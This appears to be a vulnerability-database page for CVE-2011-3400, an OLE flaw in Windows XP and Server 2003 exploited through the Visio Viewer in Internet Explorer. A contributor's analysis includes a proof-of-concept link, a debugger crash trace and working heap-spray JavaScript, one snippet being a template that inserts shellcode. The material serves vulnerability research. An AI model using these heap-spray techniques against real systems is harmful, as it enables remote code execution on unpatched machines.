Attacker Value

Unknown

CVE-2011-3400 Microsoft OLE for Windows

Attacker Value

Unknown

(1 user assessed)

Exploitability

Unknown

(1 user assessed)

User Interaction

Unknown

Privileges Required

Unknown

Attack Vector

Unknown

CVE-2011-3400 Microsoft OLE for Windows

Disclosure Date: December 14, 2011 •

CVE-2011-3400

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Metasploit Module

exploit/windows/browser/ms11_093_ole32

Description

Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka “OLE Property Vulnerability.”

Add Assessment

wchen-r7 (173)

September 12, 2019 6:08pm UTC (4 years ago)•Edited 4 years ago

Technical Analysis

PoC

PoC: http://aluigi.org/poc/ole32_1.zip
Embed a Visio Viewer In a Web Page: http://msdn.microsoft.com/en-us/library/aa168474(v=office.11).aspx

Details

Crash Windows XP SP3 Visio Viewer 2010

(9b8.9bc): Unknown exception - code e0000002 (first chance)
(9b8.9bc): C++ EH exception - code e06d7363 (first chance)
(9b8.9bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001c12b8 ebx=00000000 ecx=00400035 edx=00000000 esi=001e6498 edi=029c4240
eip=0e000000 esp=00136cf4 ebp=00136d24 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
0e000000 ??              ???
0:000> !exchain
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\triage\oca.ini, error 2
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\winxp\triage.ini, error 2
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\triage\user.ini, error 2
00136db4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\MICROS~2\Office14\VVIEWER.DLL -
VVIEWER!GetAllocCounters+132fc0 (602ae0fd)
00136de0: VVIEWER!GetAllocCounters+1332f5 (602ae432)
00136e2c: VVIEWER!GetAllocCounters+1311ba (602ac2f7)
00136ecc: VVIEWER!GetAllocCounters+1309e1 (602abb1e)
00136f40: VVIEWER!GetAllocCounters+130f7c (602ac0b9)
001381f4: VVIEWER!GetAllocCounters+11cf02 (6029803f)
00138228: VVIEWER!GetAllocCounters+11baee (60296c2b)
0013eae0: USER32!_except_handler3+0 (7e44048f)
  CRT scope  0, func:   USER32!UserCallWinProcCheckWow+155 (7e44ac6b)
0013eb40: USER32!_except_handler3+0 (7e44048f)
0013ee5c: BROWSEUI!_except_handler3+0 (76001b21)
  CRT scope  0, filter: BROWSEUI!BrowserProtectedThreadProc+56 (75fa5394)
                func:   BROWSEUI!BrowserProtectedThreadProc+72 (75fa53b5)
0013ffe0: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (7c843882)
                func:   kernel32!BaseProcessStart+3a (7c843898)

!heap addressses come on!!!!

js_pivot = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");

while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);

heap_obj.gc();
heap_obj.debugHeap(true);
for (var i=1; i < 0x1e0; i++) {
	heap_obj.alloc(block);
}
heap_obj.debugHeap(false);
JS

heap spray to populate 200020

<script>
	var heap_obj = new heapLib.ie(0x20000);
	var nops = unescape("%u0c0c%u0c0c");

	while (nops.length < 0x80000) nops += nops;
	var shellcode = nops.substring(0, 0x800);

	while (shellcode.length < 0x40000) shellcode += shellcode;
	var block = shellcode.substring(0, (0x1000-6)/2);

	alert(1);
	heap_obj.gc();
	heap_obj.debugHeap(true);
	for (var i=1; i < 0x1E; i++) {
		heap_obj.alloc(block);
	}
	heap_obj.debugHeap(false);
	alert(2);
</script>

Reliable UNICODE Pointers to the heap could be on the mapping of:

xpsp2res.dll re5.1.2600.5512

start    end        module name
01a30000 01cf5000   xpsp2res   (deferred)

About Internet Explorer 6, before update

0:010> lmv m IEXPLORE
start    end        module name
00400000 00419000   IEXPLORE   (deferred)
    Image path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
    Image name: IEXPLORE.EXE
    Timestamp:        Sun Apr 13 20:34:13 2008 (48025225)
    CheckSum:         00017A61
    ImageSize:        00019000
    File version:     6.0.2900.5512
    Product version:  6.0.2900.5512
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Microsoft® Windows® Operating System
    InternalName:     iexplore
    OriginalFilename: IEXPLORE.EXE
    ProductVersion:   6.00.2900.5512
    FileVersion:      6.00.2900.5512 (xpsp.080413-2105)
    FileDescription:  Internet Explorer
    LegalCopyright:   © Microsoft Corporation. All rights reserved.

After update

0:018> lmv m IEXPLORE
start    end        module name
00400000 00419000   IEXPLORE   (deferred)
    Image path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
    Image name: IEXPLORE.EXE
    Timestamp:        Sun Apr 13 20:34:13 2008 (48025225)
    CheckSum:         00017A61
    ImageSize:        00019000
    File version:     6.0.2900.5512
    Product version:  6.0.2900.5512
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Microsoft® Windows® Operating System
    InternalName:     iexplore
    OriginalFilename: IEXPLORE.EXE
    ProductVersion:   6.00.2900.5512
    FileVersion:      6.00.2900.5512 (xpsp.080413-2105)
    FileDescription:  Internet Explorer
    LegalCopyright:   © Microsoft Corporation. All rights reserved.

After updates:

Internet Explorer 7

0:014> lmv m IEFRAME
start    end        module name
009c0000 00f89000   IEFRAME    (deferred)
    Image path: C:\WINDOWS\system32\IEFRAME.dll
    Image name: IEFRAME.dll
    Timestamp:        Tue Aug 14 03:54:09 2007 (46C10B41)
    CheckSum:         005CA70C
    ImageSize:        005C9000
    File version:     7.0.5730.13
    Product version:  7.0.5730.13
    File flags:       8 (Mask 3F) Private
    File OS:          40004 NT Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Windows® Internet Explorer
    InternalName:     IEFRAME.DLL
    OriginalFilename: IEFRAME.DLL
    ProductVersion:   7.00.5730.13
    FileVersion:      7.00.5730.13 (longhorn(wmbla).070711-1130)
    FileDescription:  Internet Explorer
    LegalCopyright:   © Microsoft Corporation. All rights reserved.

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

None

Impact Score:

Unknown

Exploitability Score:

Unknown

Vector:

Unknown

Attack Vector (AV):

Unknown

Attack Complexity (AC):

Unknown

Privileges Required (PR):

Unknown

User Interaction (UI):

Unknown

Scope (S):

Unknown

Confidentiality (C):

Unknown

Integrity (I):

Unknown

Availability (A):

Unknown

Vendors

microsoft

Products

windows server 2003,
windows xp,
windows xp -

Metasploit Modules

exploit/windows/browser/ms11_093_ole32 (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms11_093_ole32.rb)

References

Rapid7

Unknown